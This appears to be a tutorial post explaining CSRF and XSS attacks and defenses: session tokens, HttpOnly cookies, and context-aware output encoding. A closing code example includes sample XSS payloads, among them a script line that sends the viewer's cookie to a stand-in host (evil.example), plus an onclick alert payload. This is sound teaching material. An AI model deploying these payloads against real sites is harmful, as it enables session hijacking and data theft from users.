What is CSRF?

CSRF/XSRF, full name: Cross-Site Request Forgery. An attack in which a user the server trusts (typically one who is logged in) is made to send requests the user never intended. It works because the browser attaches the user's credentials (cookies) to every request it sends to that site, no matter which page triggered the request.

How is the attack carried out?

Here’s an example:

  • User A opens a site and logs in; the server sets a session cookie, which the browser stores.
  • While A is still logged in, a pop-up ad appears promising A free money. A clicks it without thinking.
  • Later A checks the account and finds money missing. How did that happen?

Think about it: if the payment operation is a GET request, all of its parameters sit in the URL, and anyone who has seen one such URL can reproduce it with different parameters. The ad simply made A's browser load the transfer URL (as a link, or silently as the source of an image) with the attacker's account filled in as the recipient.

Whenever the browser sends a request to that site it automatically attaches A's cookie, so a forged URL that A's browser is made to load is handled by the server as a request from A. A is left dumbfounded.

  • Site: Fine, I'll change it to a POST request.
  • Hacker: Do you take me for a fool? I'm a hacker. What stops me from putting a hidden form on my page and submitting a POST request to you with JavaScript? The browser still attaches the cookie.
  • Site: ...what kind of defense is that?

Server: I have a way to defend!!

Server-side defense

Token

  • Server: I generate a random token for each client session and keep a copy in the session. The client must send it back with every state-changing request, but NOT in a cookie; otherwise the browser would attach it automatically and I'd be no better off. (I have to store the token myself, in the session; if the client doesn't send it back next time, I reject the request.)
  • Client: OK, I'll keep it in localStorage, which the browser never sends on its own, and attach it in a custom request header or a hidden form field. On each route change I check whether the token is still in localStorage and fetch a new one if it isn't.
  • Hacker: Huh? It doesn't work any more? Fine, you win this round. I'll look into it.

This works because a page on another origin cannot read the token: the same-origin policy keeps localStorage and the page's DOM private to the site that set them, so the attacker's page cannot forge a request that carries it. The caveat is that anything in localStorage is readable by any script running on the site, so this defense only holds as long as the site is also free of XSS.

What is XSS?

XSS, full name: Cross-Site Scripting. An attacker injects malicious client-side code (usually JavaScript) into a page served by the site. When a victim loads that page the code runs in the victim's browser under the site's own origin, so it can read the DOM, read cookies that are not marked HttpOnly, and make requests as the victim, letting the attacker impersonate the victim.

XSS is divided into three categories: reflected, stored, and DOM-based.

Reflected XSS:

The injected script arrives with the request: when a user clicks a malicious link, submits a crafted form, or visits a malicious site that triggers the request, the script travels to the victim's site as input. The web server reflects that input back into the response, for example in an error message or on a search-results page, and the browser executes it because the response came from the "trusted" server.
  • User A's page carries an injected anchor tag with a malicious link (it looks like an ad).
  • User A clicks the link; the reflected script runs in A's browser on the site's origin, reads A's cookie (unless it is HttpOnly) and sends it to the attacker's site.

Stored XSS:

The injected script is stored persistently on the target server (in a comment, a profile field, a database record). Whenever a browser requests that data, the server sends the script back as part of the page and the browser executes it.
  • A opens a site and finds that another user has posted a comment containing malicious JavaScript.
  • The comment, script included, is stored on the site's server and served to everyone who views the page.
  • When A views it, the script reads the content of A's own comments (or anything else A can see) and sends it to another site.
  • A's private conversations end up published all over the web.

DOM-based XSS:

The page's own client-side code modifies the DOM using attacker-controlled input (for example a URL fragment or a form field), and that modification causes the payload to execute. The HTML the server sent has not changed; the DOM in the victim's browser has been altered by legitimate client code that inserted untrusted data as markup, and the injected code runs as a side effect.
  • This attack is purely client-side; the payload need never reach the server.
  • Example: clicking the Submit button takes the user's input and inserts it into the page as HTML (an anchor tag). If the input is
  •   <a href onclick="alert(/xss/)">testLink</a>
    the handler runs as soon as the link is clicked.

Client-side defense

HttpOnly prevents cookie theft

Add to the response header:

Set-Cookie: id=a3fWa; Expires=Wed, 21 Oct 2015 07:28:00 GMT; Secure; HttpOnly

This makes the cookie inaccessible to JavaScript's document.cookie API, so a script injected by XSS cannot read it and send it to the attacker. It does not stop that script from making requests that carry the cookie, so HttpOnly limits the damage of XSS rather than preventing it.

Cookies that carry a server-side session ID never need to be available to JavaScript, so mark them HttpOnly (and Secure) by default.

Input check

  • Filter or encode special characters such as < and > supplied by the user. The map below (its entity strings were lost in the original rendering) pairs each character that has meaning in HTML with its entity:

    const encodingMap = { '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;', '&': '&amp;' }

    Input filtering on its own is not sufficient: the same data may later be written into an attribute, a URL or a script, where a different encoding is needed, and data that bypassed the filter (imported, entered through another channel) is not covered.

Output check (server-side defense)

  • Except for rich-text output (which needs a whitelist-based HTML sanitizer), encode or escape every variable at the point where it is written into an HTML page, choosing the encoding for the context it lands in: HTML body, attribute value, JavaScript string or URL. This is the primary XSS defense; the input check above is a complement, not a replacement.
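The output-encoding rule above, applied to the stored-XSS comment scenario from earlier in the page, as an added example (not code from the original post). It goes a little beyond the text by encoding three contexts (HTML body, attribute value, URL) rather than just `<` and `>`. The comment record, the `evil.example` host, the page template and all function names are constructed for this illustration.

```javascript
// Added example (not from the original post): context-aware output
// encoding applied to the stored-XSS comment scenario from the text.
// The comment record and the list-item template are constructed here.

// HTML body / text-node context: escape the five characters that can
// start or terminate markup.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Attribute-value context: encode everything that is not alphanumeric as
// a numeric entity, so the value cannot close the attribute or add a new
// one even if the template forgot the quotes.
function escapeAttr(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, (c) => `&#${c.charCodeAt(0)};`);
}

// URL context: allow only http(s) links; a javascript: URL in href runs
// when clicked no matter how well the rest of the page is escaped.
function safeHref(url) {
  try {
    const u = new URL(String(url));
    return (u.protocol === 'http:' || u.protocol === 'https:') ? u.href : '#';
  } catch {
    return '#';
  }
}

// Vulnerable rendering: untrusted fields concatenated straight into HTML,
// which is how the stored comment from the text reaches other users.
function renderCommentVulnerable(c) {
  return `<li><a href="${c.homepage}" title="${c.author}">${c.author}</a>: ${c.text}</li>`;
}

// Hardened rendering: each field encoded for the context it lands in.
function renderCommentSafe(c) {
  return `<li><a href="${escapeAttr(safeHref(c.homepage))}" title="${escapeAttr(c.author)}">` +
         `${escapeHtml(c.author)}</a>: ${escapeHtml(c.text)}</li>`;
}

// Constructed stored-XSS payload: the text tries to exfiltrate the
// viewer's cookie, the author breaks out of the title attribute, and the
// homepage is a javascript: URL.
const hostileComment = {
  author: 'mallory" onmouseover="alert(1)',
  homepage: 'javascript:alert(document.cookie)',
  text: '<script>fetch("https://evil.example/?c=" + document.cookie)</script>',
};

// True when the rendered markup still contains a script tag, a
// javascript: URL or a quoted event-handler attribute, i.e. the payload
// survived rendering.
function containsActiveContent(html) {
  return /<script|javascript:|\son\w+="/i.test(html);
}
```

`renderCommentVulnerable(hostileComment)` ships all three payloads to every viewer; `renderCommentSafe(hostileComment)` shows the same text harmlessly. For the DOM-based case the browser-side equivalent is to insert untrusted data with `textContent` or `setAttribute` on an element built with `createElement`, never by assigning it to `innerHTML`.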

Conclusion:

This is a first summary of CSRF and XSS. There are many more web security issues; more will be added later.